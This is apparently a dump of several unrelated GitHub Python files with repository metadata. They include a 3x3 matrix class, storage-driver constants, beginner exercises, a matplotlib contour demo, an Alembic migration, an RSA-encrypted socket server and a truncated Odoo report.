for roi_type in ['mask','sphere']:\n            for field_name in ['E_normal','E_norm']:\n                for subject_space in ['mni2sub','sub']:\n                    if roi_type== 'mask': #mask error in subject 
space because different sizes of rois\n readout_in = 'fsaverage_mni_space'\n r=[]\n RE.Read_out_Efields(Experiment, Session,region,field_name,subject_space,readout_in,roi_type,r)\n else: \n #for readout_in in ['sub-space','fsaverage_mni_space']:\n readout_in in 'fsaverage_mni_space' \n for radius in [12.5,25,32.5]: #radius in mm\n r=radius\n try:\n RE.Read_out_Efields(Experiment, Session,region,field_name,subject_space,readout_in,roi_type,r)\n except Exception:\n traceback.print_exc()\n\"\"\"\n","repo_name":"LawsOfForm/VerFlu_Simulation_Niemann_2023","sub_path":"02_Simulation/05_Analysis_Function_ROI.py","file_name":"05_Analysis_Function_ROI.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27102792479","text":"import math\n\nclass mat3:\n def __init__(self, a=0, b=0, c=0, d=0, e=0, f=0, g=0, h=0, i=0):\n \"\"\"\n Classe que representa uma matriz 3x3.\n\n Args:\n a (float): valor da posição (1,1) da matriz. Default é 0.\n b (float): valor da posição (1,2) da matriz. Default é 0.\n c (float): valor da posição (1,3) da matriz. Default é 0.\n d (float): valor da posição (2,1) da matriz. Default é 0.\n e (float): valor da posição (2,2) da matriz. Default é 0.\n f (float): valor da posição (2,3) da matriz. Default é 0.\n g (float): valor da posição (3,1) da matriz. Default é 0.\n h (float): valor da posição (3,2) da matriz. Default é 0.\n i (float): valor da posição (3,3) da matriz. Default é 0.\n \"\"\"\n self.a = a\n self.b = b\n self.c = c\n \n self.d = d\n self.e = e\n self.f = f\n \n self.g = g\n self.h = h\n self.i = i\n \n def __add__(self, other):\n \"\"\"\n Sobrecarga do operador + para somar duas matrizes.\n\n Args:\n other (mat3): outra matriz 3x3.\n\n Returns:\n mat3: matriz resultante da soma.\n \"\"\"\n return mat3(self.a + other.a, self.b + other.b, self.c + other.c, self.d + other.d, self.e + other.e, self.f + other.f, self.g + other.g, self.h + other.h, self.i + other.i)\n \n def __sub__(self, other):\n \"\"\"\n Sobrecarga do operador - para subtrair duas matrizes.\n\n Args:\n other (mat3): outra matriz 3x3.\n\n Returns:\n mat3: matriz resultante da subtração.\n \"\"\"\n return mat3(self.a - other.a, self.b - other.b, self.c - other.c, self.d - other.d, self.e - other.e, self.f - other.f, self.g - other.g, self.h - other.h, self.i - other.i)\n \n def __mul__(self, other):\n \"\"\"\n Sobrecarga do operador * para multiplicação por escalar ou outra matriz.\n\n Args:\n other (int, float, mat3): escalar ou outra matriz 3x3.\n\n Returns:\n mat3: matriz resultante da multiplicação.\n \n Raises:\n TypeError: se o tipo de other não for compatível.\n \"\"\"\n if isinstance(other, (int, float)):\n return mat3(self.a * other, self.b * other, self.c * other, self.d * other, self.e * other, self.f * other, self.g * other, self.h * other, self.i * other)\n elif isinstance(other, mat3):\n return mat3(\n self.a * other.a + self.b * other.d + self.c * other.g,\n self.a * other.b + self.b * other.e + self.c * other.h,\n self.a * other.c + self.b * other.f + self.c * other.i,\n \n self.d * other.a + self.e * other.d + self.f * other.g,\n self.d * other.b + self.e * other.e + self.f * other.h,\n self.d * other.c + self.e * other.f + self.f * other.i,\n \n self.g * other.a + self.h * other.d + self.i * other.g,\n self.g * other.b + self.h * other.e + self.i * other.h,\n self.g * other.c + self.h * other.f + self.i * other.i\n )\n else:\n raise TypeError(\"tipo incompativel\")\n \n def 
__str__(self):\n \"\"\"\n Representação em string da matriz.\n\n Returns:\n str: string que representa a matriz.\n \"\"\"\n return f\"[{self.a}, {self.b}, {self.c}]\\n[{self.d}, {self.e}, {self.f}]\\n[{self.g}, {self.h}, {self.i}]\"\n \n def det(self):\n \"\"\"\n Calcula o determinante da matriz.\n\n Returns:\n float: determinante da matriz.\n \"\"\"\n return self.a * self.e * self.i + self.b * self.f * self.g + self.c * self.d * self.h - self.c * self.e * self.g - self.b * self.d * self.i - self.a * self.f * self.h\n \n def inverse(self):\n \"\"\"\n Calcula a inversa da matriz.\n\n Returns:\n mat3: matriz inversa.\n\n Raises:\n ZeroDivisionError: se a matriz não for inversível.\n \"\"\"\n det = self.det()\n if det == 0:\n raise ZeroDivisionError(\"matriz não inversivel\")\n return mat3(\n self.e * self.i - self.f * self.h,\n self.c * self.h - self.b * self.i,\n self.b * self.f - self.c * self.e,\n \n self.f * self.g - self.d * self.i,\n self.a * self.i - self.c * self.g,\n self.c * self.d - self.a * self.f,\n \n self.d * self.h - self.e * self.g,\n self.b * self.g - self.a * self.h,\n self.a * self.e - self.b * self.d\n ) * (1/det)\n ","repo_name":"rodrigoamral/cg-atividades","sub_path":"atividade-2/src/mat3.py","file_name":"mat3.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26247843296","text":"from delfin.common import constants\n\nSTATUS_HEALTH = '1'\nSTATUS_ACTIVE = '43'\nSTATUS_RUNNING = '10'\nSTATUS_VOLUME_READY = '27'\nSTATUS_LUNCOPY_READY = '40'\nSTATUS_QOS_ACTIVE = '2'\nQOS_INACTIVATED = '45'\nLUN_TYPE = '11'\nSNAPSHOT_TYPE = '27'\nSTATUS_POOL_ONLINE = '27'\nSTATUS_STORAGE_NORMAL = '1'\nSTATUS_CTRLR_OFFLINE = '28'\nSTATUS_CTRLR_UNKNOWN = '0'\n\nPORT_TYPE_FC = '212'\nPORT_TYPE_ETH = '213'\nPORT_TYPE_SAS = '214'\nPORT_TYPE_FCOE = '252'\nPORT_TYPE_PCIE = '233'\nPORT_TYPE_BOND = '235'\n\nPORT_LOGICTYPE_HOST = '0'\nPORT_HEALTH_UNKNOWN = '0'\nPORT_HEALTH_NORMAL = '1'\nPORT_HEALTH_FAULTY = '2'\nPORT_HEALTH_ABOUTFAIL = '3'\nPORT_HEALTH_PARTIALLYDAMAGED = '4'\nPORT_HEALTH_INCONSISTENT = '9'\n\nPORT_RUNNINGSTS_UNKNOWN = '0'\nPORT_RUNNINGSTS_NORMAL = '1'\nPORT_RUNNINGSTS_RUNNING = '2'\nPORT_RUNNINGSTS_LINKUP = '10'\nPORT_RUNNINGSTS_LINKDOWN = '11'\nPORT_RUNNINGSTS_TOBERECOVERED = '33'\n\nPORT_LOGICTYPE_EXPANSION = '1'\nPORT_LOGICTYPE_MANAGEMENT = '2'\nPORT_LOGICTYPE_INTERNAL = '3'\nPORT_LOGICTYPE_MAINTENANCE = '4'\nPORT_LOGICTYPE_SERVICE = '5'\nPORT_LOGICTYPE_MAINTENANCE2 = '6'\nPORT_LOGICTYPE_INTERCONNECT = '11'\n\nPortTypeMap = {\n PORT_TYPE_FC: constants.PortType.FC,\n PORT_TYPE_FCOE: constants.PortType.FCOE,\n PORT_TYPE_ETH: constants.PortType.ETH,\n PORT_TYPE_PCIE: constants.PortType.OTHER,\n PORT_TYPE_SAS: constants.PortType.SAS,\n PORT_TYPE_BOND: constants.PortType.OTHER,\n}\n\nPortLogicTypeMap = {\n PORT_LOGICTYPE_HOST:\n constants.PortLogicalType.SERVICE,\n PORT_LOGICTYPE_EXPANSION:\n constants.PortLogicalType.OTHER,\n PORT_LOGICTYPE_MANAGEMENT:\n constants.PortLogicalType.MANAGEMENT,\n PORT_LOGICTYPE_INTERNAL:\n constants.PortLogicalType.INTERNAL,\n PORT_LOGICTYPE_MAINTENANCE:\n constants.PortLogicalType.MAINTENANCE,\n PORT_LOGICTYPE_SERVICE:\n constants.PortLogicalType.SERVICE,\n PORT_LOGICTYPE_MAINTENANCE2:\n constants.PortLogicalType.MAINTENANCE,\n PORT_LOGICTYPE_INTERCONNECT:\n constants.PortLogicalType.INTERCONNECT,\n}\n\nDISK_STATUS_UNKNOWN = '0'\nDISK_STATUS_NORMAL = '1'\nDISK_STATUS_OFFLINE = '28'\n\nDISK_TYPE_SAS = '1'\nDISK_TYPE_SATA = '2'\nDISK_TYPE_SSD = 
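# --- Aside: a quick sanity check for the mat3 class in the record above --
# multiplying a matrix by its inverse should give the identity (assumes the
# class is importable as defined; exact values here are made up):
m = mat3(2, 0, 1,
         0, 1, 0,
         1, 0, 1)
ident = m * m.inverse()
for got, want in zip([ident.a, ident.e, ident.i], [1, 1, 1]):
    assert abs(got - want) < 1e-9
assert abs(m.det() - 1) < 1e-9   # det([[2,0,1],[0,1,0],[1,0,1]]) = 1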
'3'\n\nDISK_LOGICTYPE_FREE = '1'\nDISK_LOGICTYPE_MEMBER = '2'\nDISK_LOGICTYPE_HOTSPARE = '3'\nDISK_LOGICTYPE_CACHE = '4'\n\nDiskPhysicalTypeMap = {\n DISK_TYPE_SATA: constants.DiskPhysicalType.SATA,\n DISK_TYPE_SAS: constants.DiskPhysicalType.SAS,\n DISK_TYPE_SSD: constants.DiskPhysicalType.SSD,\n}\n\nDiskLogicalTypeMap = {\n DISK_LOGICTYPE_FREE:\n constants.DiskLogicalType.FREE,\n DISK_LOGICTYPE_MEMBER:\n constants.DiskLogicalType.MEMBER,\n DISK_LOGICTYPE_HOTSPARE:\n constants.DiskLogicalType.HOTSPARE,\n DISK_LOGICTYPE_CACHE:\n constants.DiskLogicalType.CACHE,\n}\n\nFS_WORM_COMPLIANCE = '1'\nFS_WORM_AUDIT_LOG = '2'\nFS_WORM_ENTERPRISE = '3'\n\nFS_HEALTH_NORMAL = '1'\nFS_TYPE_THICK = '0'\nFS_TYPE_THIN = '1'\nPARENT_TYPE_POOL = 216\n\nQUOTA_NOT_ENABLED = 'INVALID_VALUE64'\nQUOTA_TYPE_TREE = '1'\nQUOTA_TYPE_USER = '2'\nQUOTA_TYPE_GROUP = '3'\n\nSECURITY_STYLE_MIXED = '0'\nSECURITY_STYLE_NATIVE = '1'\nSECURITY_STYLE_NTFS = '2'\nSECURITY_STYLE_UNIX = '3'\n\nPARENT_OBJECT_TYPE_FS = 40\nSHARE_NFS = '16401'\n\nERROR_CONNECT_TO_SERVER = -403\nERROR_UNAUTHORIZED_TO_SERVER = -401\n\nSOCKET_TIMEOUT = 52\nLOGIN_SOCKET_TIMEOUT = 4\n\nERROR_VOLUME_NOT_EXIST = 1077939726\nRELOGIN_ERROR_PASS = [ERROR_VOLUME_NOT_EXIST]\nPWD_EXPIRED = 3\nPWD_RESET = 4\n\nBLOCK_STORAGE_POOL_TYPE = '1'\nFILE_SYSTEM_POOL_TYPE = '2'\n\nSECTORS_SIZE = 512\nQUERY_PAGE_SIZE = 100\n\nTHICK_LUNTYPE = '0'\nTHIN_LUNTYPE = '1'\n\nHOST_OS = [\n constants.HostOSTypes.LINUX,\n constants.HostOSTypes.WINDOWS,\n constants.HostOSTypes.SOLARIS,\n constants.HostOSTypes.HP_UX,\n constants.HostOSTypes.AIX,\n constants.HostOSTypes.XEN_SERVER,\n constants.HostOSTypes.VMWARE_ESX,\n constants.HostOSTypes.LINUX_VIS,\n constants.HostOSTypes.WINDOWS_SERVER_2012,\n constants.HostOSTypes.ORACLE_VM,\n constants.HostOSTypes.OPEN_VMS,\n]\n\nHOST_RUNNINGSTATUS_NORMAL = '1'\nINITIATOR_RUNNINGSTATUS_UNKNOWN = '0'\nINITIATOR_RUNNINGSTATUS_ONLINE = '27'\nINITIATOR_RUNNINGSTATUS_OFFLINE = '28'\nISCSI_INITIATOR_TYPE = 222\nFC_INITIATOR_TYPE = 223\nIB_INITIATOR_TYPE = 16499\nISCSI_INITIATOR_DESCRIPTION = 'iSCSI Initiator'\nFC_INITIATOR_DESCRIPTION = 'FC Initiator'\nIB_INITIATOR_DESCRIPTION = 'IB Initiator'\nUNKNOWN_INITIATOR_DESCRIPTION = 'Unknown Initiator'\n\nOCEANSTOR_METRICS = {\n 'iops': '22',\n 'readIops': '25',\n 'writeIops': '28',\n 'throughput': '21',\n 'readThroughput': '23',\n 'writeThroughput': '26',\n 'responseTime': '370',\n 'ioSize': '228',\n 'readIoSize': '24',\n 'writeIoSize': '27',\n 'cacheHitRatio': '303',\n 'readCacheHitRatio': '93',\n 'writeCacheHitRatio': '95',\n}\n\nCONVERT_TO_MILLI_SECOND_LIST = [\n 'responseTime'\n]\n\nIOPS_DESCRIPTION = {\n \"unit\": \"IOPS\",\n \"description\": \"Input/output operations per second\"\n}\nREAD_IOPS_DESCRIPTION = {\n \"unit\": \"IOPS\",\n \"description\": \"Read input/output operations per second\"\n}\nWRITE_IOPS_DESCRIPTION = {\n \"unit\": \"IOPS\",\n \"description\": \"Write input/output operations per second\"\n}\nTHROUGHPUT_DESCRIPTION = {\n \"unit\": \"MB/s\",\n \"description\": \"Represents how much data is \"\n \"successfully transferred in MB/s\"\n}\nREAD_THROUGHPUT_DESCRIPTION = {\n \"unit\": \"MB/s\",\n \"description\": \"Represents how much data read is \"\n \"successfully transferred in MB/s\"\n}\nWRITE_THROUGHPUT_DESCRIPTION = {\n \"unit\": \"MB/s\",\n \"description\": \"Represents how much data write is \"\n \"successfully transferred in MB/s\"\n}\nRESPONSE_TIME_DESCRIPTION = {\n \"unit\": \"ms\",\n \"description\": \"Average time taken for an IO \"\n \"operation in 
ms\"\n}\nCACHE_HIT_RATIO_DESCRIPTION = {\n \"unit\": \"%\",\n \"description\": \"Percentage of io that are cache hits\"\n}\nREAD_CACHE_HIT_RATIO_DESCRIPTION = {\n \"unit\": \"%\",\n \"description\": \"Percentage of read ops that are cache hits\"\n}\nWRITE_CACHE_HIT_RATIO_DESCRIPTION = {\n \"unit\": \"%\",\n \"description\": \"Percentage of write ops that are cache hits\"\n}\nIO_SIZE_DESCRIPTION = {\n \"unit\": \"KB\",\n \"description\": \"The average size of IO requests in KB\"\n}\nREAD_IO_SIZE_DESCRIPTION = {\n \"unit\": \"KB\",\n \"description\": \"The average size of read IO requests in KB\"\n}\nWRITE_IO_SIZE_DESCRIPTION = {\n \"unit\": \"KB\",\n \"description\": \"The average size of write IO requests in KB\"\n}\nCPU_USAGE_DESCRIPTION = {\n \"unit\": \"%\",\n \"description\": \"Percentage of CPU usage\"\n}\nMEMORY_USAGE_DESCRIPTION = {\n \"unit\": \"%\",\n \"description\": \"Percentage of DISK memory usage in percentage\"\n}\nSERVICE_TIME = {\n \"unit\": 'ms',\n \"description\": \"Service time of the resource in ms\"\n}\nPOOL_CAP = {\n \"iops\": IOPS_DESCRIPTION,\n \"readIops\": READ_IOPS_DESCRIPTION,\n \"writeIops\": WRITE_IOPS_DESCRIPTION,\n \"throughput\": THROUGHPUT_DESCRIPTION,\n \"readThroughput\": READ_THROUGHPUT_DESCRIPTION,\n \"writeThroughput\": WRITE_THROUGHPUT_DESCRIPTION,\n \"responseTime\": RESPONSE_TIME_DESCRIPTION,\n}\nVOLUME_CAP = {\n \"iops\": IOPS_DESCRIPTION,\n \"readIops\": READ_IOPS_DESCRIPTION,\n \"writeIops\": WRITE_IOPS_DESCRIPTION,\n \"throughput\": THROUGHPUT_DESCRIPTION,\n \"readThroughput\": READ_THROUGHPUT_DESCRIPTION,\n \"writeThroughput\": WRITE_THROUGHPUT_DESCRIPTION,\n \"responseTime\": RESPONSE_TIME_DESCRIPTION,\n \"cacheHitRatio\": CACHE_HIT_RATIO_DESCRIPTION,\n \"readCacheHitRatio\": READ_CACHE_HIT_RATIO_DESCRIPTION,\n \"writeCacheHitRatio\": WRITE_CACHE_HIT_RATIO_DESCRIPTION,\n \"ioSize\": IO_SIZE_DESCRIPTION,\n \"readIoSize\": READ_IO_SIZE_DESCRIPTION,\n \"writeIoSize\": WRITE_IO_SIZE_DESCRIPTION,\n}\nCONTROLLER_CAP = {\n \"iops\": IOPS_DESCRIPTION,\n \"readIops\": READ_IOPS_DESCRIPTION,\n \"writeIops\": WRITE_IOPS_DESCRIPTION,\n \"throughput\": THROUGHPUT_DESCRIPTION,\n \"readThroughput\": READ_THROUGHPUT_DESCRIPTION,\n \"writeThroughput\": WRITE_THROUGHPUT_DESCRIPTION,\n \"responseTime\": RESPONSE_TIME_DESCRIPTION,\n}\nPORT_CAP = {\n \"iops\": IOPS_DESCRIPTION,\n \"readIops\": READ_IOPS_DESCRIPTION,\n \"writeIops\": WRITE_IOPS_DESCRIPTION,\n \"throughput\": THROUGHPUT_DESCRIPTION,\n \"readThroughput\": READ_THROUGHPUT_DESCRIPTION,\n \"writeThroughput\": WRITE_THROUGHPUT_DESCRIPTION,\n \"responseTime\": RESPONSE_TIME_DESCRIPTION,\n}\nDISK_CAP = {\n \"iops\": IOPS_DESCRIPTION,\n \"readIops\": READ_IOPS_DESCRIPTION,\n \"writeIops\": WRITE_IOPS_DESCRIPTION,\n \"throughput\": THROUGHPUT_DESCRIPTION,\n \"readThroughput\": READ_THROUGHPUT_DESCRIPTION,\n \"writeThroughput\": WRITE_THROUGHPUT_DESCRIPTION,\n \"responseTime\": RESPONSE_TIME_DESCRIPTION,\n}\n","repo_name":"sodafoundation/delfin","sub_path":"delfin/drivers/huawei/oceanstor/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":8575,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"6"} +{"seq_id":"17035446074","text":"# 競輪のユニフォーム (paizaランク D 相当)\n# https://paiza.jp/works/mondai/forest_contest_002/forest_contest_002__d_keirin\n\nINPUT1 = \"\"\"\\\n2\n\"\"\"\nOUTPUT1 = \"\"\"\\\nblack\n\"\"\"\n\nINPUT2 = \"\"\"\\\n5\n\"\"\"\nOUTPUT2 =\"\"\"\\\nyellow\n\"\"\"\n\n'''\n# 解答例1\n# 入力\nn = int(input())\n\n# n に対応した色を color に代入\ncolor = 
\"\"\nif n == 1:\n color = \"white\"\nelif n == 2:\n color = \"black\"\nelif n == 3:\n color = \"red\"\nelif n == 4:\n color = \"blue\"\nelif n == 5:\n color = \"yellow\"\nelif n == 6:\n color = \"green\"\nelif n == 7:\n color = \"orange\"\nelif n == 8:\n color = \"pink\"\nelif n == 9:\n color = \"purple\"\n\n# color を出力\nprint(color)\n'''\n\n# 解答例2\n# 色の設定\ncolors = [\"white\", \"black\", \"red\", \"blue\", \"yellow\", \"green\", \"orange\", \"pink\", \"purple\"]\n\n# なるべく少ない入力で配列を作るなら\n# split メソッド\n# colors = \"white black red blue yellow green orange pink purple\".split()\n\n# 入力\nn = int(input())\n\n# n に対応した色を出力\nprint(colors[n - 1])\n\n\n'''\nn が\n1のとき、white\n2のとき、black\n3のとき、red\n4のとき、blue\n5のとき、yellow\n6のとき、green\n7のとき、orange\n8のとき、pink\n9のとき、purple\n'''","repo_name":"atsushi0919/paiza_workbook","sub_path":"forest_contest/02/02-001_d_keirin.py","file_name":"02-001_d_keirin.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26363553650","text":"# Calificaciones alfabéticas a numéricas\r\na = 4.0\r\na_minus = 3.7\r\nb_plus = 3.3\r\nb = 3.0\r\nb_minus = 2.7\r\nc_plus = 2.3\r\nc = 2.0\r\nc_minus = 1.7\r\nd_plus = 1.3\r\nd = 1.0\r\nf = 0\r\nno_valido = -1\r\n\r\nletra = input(\"Introduce una calificación alfabética: \")\r\nletra = letra.upper()\r\nif letra == \"A+\" or letra == \"A\":\r\n notanum = a\r\nelif letra == \"A-\":\r\n notanum = a_minus\r\nelif letra == \"B+\":\r\n notanum = b_plus\r\nelif letra == \"B\":\r\n notanum = b\r\nelif letra == \"B-\":\r\n notanum = b_minus\r\nelif letra == \"C+\":\r\n notanum = c_plus\r\nelif letra == \"C\":\r\n notanum = c\r\nelif letra == \"C-\":\r\n notanum = c_minus\r\nelif letra == \"D+\":\r\n notanum = d_plus\r\nelif letra == \"D\":\r\n notanum = d\r\nelif letra == \"F\":\r\n notanum = f\r\nelse:\r\n notanum = no_valido\r\n\r\nif notanum == no_valido:\r\n print(\"No es una calificación académica.\")\r\nelse:\r\n print(\"Es un \" + str(notanum))\r\n","repo_name":"DBidaux/Pycharm-Ejercicios","sub_path":"Ejercicios/Ejercicios libro pdf/Ejercicios Tema 2/Ejercicio 2.51.py","file_name":"Ejercicio 2.51.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29578450590","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nhttps://jakevdp.github.io/PythonDataScienceHandbook/04.04-density-and-contour-plots.html\r\nCreated on Fri Oct 26 13:48:35 2018\r\n\r\n@author: Akitaka\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nplt.style.use('seaborn-white')\r\nimport numpy as np\r\n\r\n# Visualizing a Three-Dimensional Function\r\ndef f(x, y):\r\n return np.sin(x) ** 10 + np.cos(10 + y * x) * np.cos(x)\r\n\r\nx = np.linspace(0, 5, 50)\r\ny = np.linspace(0, 5, 40)\r\nX, Y = np.meshgrid(x, y)\r\nZ = f(X, Y)\r\nplt.xkcd()\r\nplt.contour(X, Y, Z, colors='black');\r\n#%%\r\nplt.xkcd()\r\nplt.contour(X, Y, Z, 20, cmap='RdGy');\r\n\r\n#%%\r\nplt.contourf(X, Y, Z, 20, cmap='RdGy')\r\nplt.colorbar();\r\n\r\n#%%\r\nplt.imshow(Z, extent=[0, 5, 0, 5], origin='lower',\r\n cmap='RdGy')\r\nplt.colorbar()\r\nplt.axis(aspect='image');\r\n\r\n#%%\r\ncontours = plt.contour(X, Y, Z, 3, colors='black')\r\nplt.clabel(contours, inline=True, fontsize=8)\r\n\r\nplt.imshow(Z, extent=[0, 5, 0, 5], origin='lower',\r\n cmap='RdGy', 
alpha=0.5)\r\nplt.colorbar();","repo_name":"nakanishi-akitaka/python2018_backup","sub_path":"1026/04.04_density_and_contour_plots.py","file_name":"04.04_density_and_contour_plots.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"}
+{"seq_id":"44333501511","text":"\"\"\"Create Pricelist and Item tables\n\nRevision ID: d7a46768014a\nRevises: \nCreate Date: 2022-11-08 19:42:40.141637\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy_utils\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd7a46768014a'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('pricelists',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_table('items',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('name', sa.String(length=64), nullable=False),\n    sa.Column('price', sa.Integer(), nullable=False),\n    sa.Column('pricelist_id', sa.Integer(), nullable=True),\n    sa.ForeignKeyConstraint(['pricelist_id'], ['pricelists.id'], ),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_index(op.f('ix_items_pricelist_id'), 'items', ['pricelist_id'], unique=False)\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_index(op.f('ix_items_pricelist_id'), table_name='items')\n    op.drop_table('items')\n    op.drop_table('pricelists')\n    # ### end Alembic commands ###\n","repo_name":"matthieuchoplin/brit-assessment","sub_path":"src/migrations/versions/d7a46768014a_create_pricelist_and_item_tables.py","file_name":"d7a46768014a_create_pricelist_and_item_tables.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"7218853166","text":"from multiprocessing import freeze_support\nimport pickle\nimport struct\nimport socketserver\nimport rsa\nimport core\nimport threading\n\n\nclass MyTCPHandler(socketserver.BaseRequestHandler):\n    def __init__(self, request, client_address, server):\n        super().__init__(request, client_address, server)\n\n    def recv(self):\n        # length-prefix framing: 256 marks a single 256-byte RSA block, 257 a\n        # multi-block message (struct, not pickle, handles the fixed-size int header)\n        size_byte = self.request.recv(4)\n        size = struct.unpack('i', size_byte)[0]\n        # print(size)\n        if size == 256:\n            crypt_byte_msg = self.request.recv(256)\n            msg = rsa.decrypt(crypt_byte_msg, self.private_key)\n            return pickle.loads(msg)\n        elif size == 257:\n            package_number = self.request.recv(4)\n            package_number = struct.unpack('i', package_number)[0]\n            result = b''\n            for i in range(package_number):\n                crypt_byte_msg = self.request.recv(256)\n                msg = rsa.decrypt(crypt_byte_msg, self.private_key)\n                result = result + msg\n            return pickle.loads(result)\n\n    def send(self, msg):\n        msg_byte = pickle.dumps(msg)\n        if len(msg_byte) > 245:\n            self.request.sendall(struct.pack('i', 257))\n            package_number = (len(msg_byte) // 245) + 1\n            self.request.sendall(struct.pack('i', package_number))\n            for i in range(package_number):\n                msg_to_send = msg_byte[i * 245:i * 245 + 245]\n                crypt_byte_msg = rsa.encrypt(msg_to_send, self.key_rec)\n                self.request.sendall(crypt_byte_msg)\n        elif len(msg_byte) <= 245:\n            crypt_byte_msg = rsa.encrypt(msg_byte, self.key_rec)\n            # pkg\n            self.request.sendall(struct.pack('i', 256))\n            self.request.sendall(crypt_byte_msg)
pass\")\n self.send(True)\n else:\n self.send(False)\n\n def get_cell(self):\n cell = self.recv()\n for num in cell:\n length = len(cell[num][1])\n if (cell[num][0] != '无') or (length > 0):\n if num in work_book.sheet:\n lock.acquire()\n work_book.sheet[num] = cell[num]\n lock.release()\n else:\n lock.acquire()\n work_book.sheet[num] = []\n work_book.sheet[num] = cell[num]\n lock.release()\n \n\n def reply(self):\n number = self.recv()\n if number in work_book.sheet:\n cell = work_book.sheet[number]\n self.send(cell)\n else:\n print('新号码')\n self.send(None)\n\n def reply_operate(self, operate):\n if operate is None:\n print(\"none\")\n elif operate == 1:\n self.get_cell()\n elif operate == 2:\n self.reply()\n\n def server_operate(self, operate):\n if operate is None:\n print('none')\n elif operate == 3:\n file = self.recv()\n work_book.xl_write(file)\n elif operate == 4:\n file = self.recv()\n lock.acquire()\n work_book.xl_read(file)\n lock.release()\n elif operate == 5:\n file = self.recv()\n day = self.recv()\n temp_book = core.Book()\n temp_book.sheet = work_book.search_day(day)\n temp_book.xl_write(file)\n elif operate == 6:\n user = self.recv()\n password = self.recv()\n core.add_user(user, password)\n elif operate == 7:\n user = self.recv()\n core.del_user(user)\n\n def setup(self):\n lock.acquire()\n work_book.record_read()\n lock.release()\n print(\"before handle,连接建立:\", self.client_address)\n (self.pub_key, self.private_key) = rsa.newkeys(2048, poolsize=2)\n self.request.sendall(pickle.dumps(self.pub_key))\n key = self.request.recv(309)\n self.key_rec = pickle.loads(key)\n print(self.key_rec)\n try:\n self.login()\n except ConnectionError as e:\n print('登录失败')\n self.server.shutdown_request(self.request)\n self.server.close_request(self.request)\n print(e)\n\n def handle(self):\n try:\n while True:\n operate = self.recv()\n if self.client_address[0] == host[0]:\n self.server_operate(operate)\n self.reply_operate(operate)\n else:\n self.reply_operate(operate)\n print(operate)\n work_book.record_write()\n except Exception as e:\n print(self.client_address, \"连接断开\", e)\n finally:\n work_book.record_write()\n self.server.shutdown_request(self.request)\n self.server.close_request(self.request)\n\n def finish(self):\n work_book.record_write()\n\n\nif __name__ == '__main__':\n freeze_support()\n lock = threading.Lock()\n work_book = core.Book()\n host = core.get_host()\n server = socketserver.ThreadingTCPServer(host, MyTCPHandler) # 多线程版\n server.serve_forever()\n","repo_name":"jerry-harm/simplecms","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"9293900451","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def deleteDuplicates(self, head):\n if not head or not head.next:\n return None\n\n curr = head\n while curr and curr.next:\n if curr.val == curr.next.val:\n curr.next = curr.next.next\n else:\n curr = curr.next\n\n return head","repo_name":"rioshen/Problems","sub_path":"leetcode/python/remove_duplicates_from_sorted_list.py","file_name":"remove_duplicates_from_sorted_list.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"2995628559","text":"# -*- coding: utf-8 -*-\n# -*- coding: utf-8 
-*-\n\nfrom odoo import api, models, fields\nfrom odoo.tools.float_utils import float_round as round\nfrom openerp.exceptions import ValidationError, Warning\nfrom datetime import timedelta, date, datetime, time\nfrom num2words import num2words\n\nimport locale\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nclass ReportStockPickingRefrigerated(models.AbstractModel):\n _name = \"report.veggie.roadmap_report_refrigerated\"\n \n def _all_products_for_clients(self, date):\n categoria_refrigerados = []\n main_categ = None\n all_date = {}\n if len(date) > 1:\n for rec in date:\n for line in rec.sale_id:\n for order_line in line.order_line:\n if order_line.product_id.categ_id.name == 'Todos':\n continue\n if order_line.product_id.categ_id.parent_id.name:\n main_categ = order_line.product_id.categ_id.parent_id.name if order_line.product_id.categ_id.parent_id else None\n categ = order_line.product_id.categ_id.name\n order_category = order_line.product_id.categ_id.order_report\n product_name = order_line.product_id.description_pickingout\n quantity_product = order_line.product_uom_qty\n if len(product_name) > 13:\n product_name = product_name[:13]\n line_data = {\n 'categ': categ,\n 'main_categ': main_categ,\n 'order_category': order_category,\n 'total_products': int(quantity_product),\n 'data': [{\n 'product_name': product_name,\n 'quantity_product': int(quantity_product),\n 'order_product':order_line.product_id.order_report,\n\n }]\n }\n else:\n raise ValidationError(f'El producto {order_line.product_id.description_pickingout}, no tiene categoria padre, referencia {rec.name}!! ') \n try:\n if main_categ == 'Refrigerados':\n \n if categoria_refrigerados:\n categoria_refrigerados = 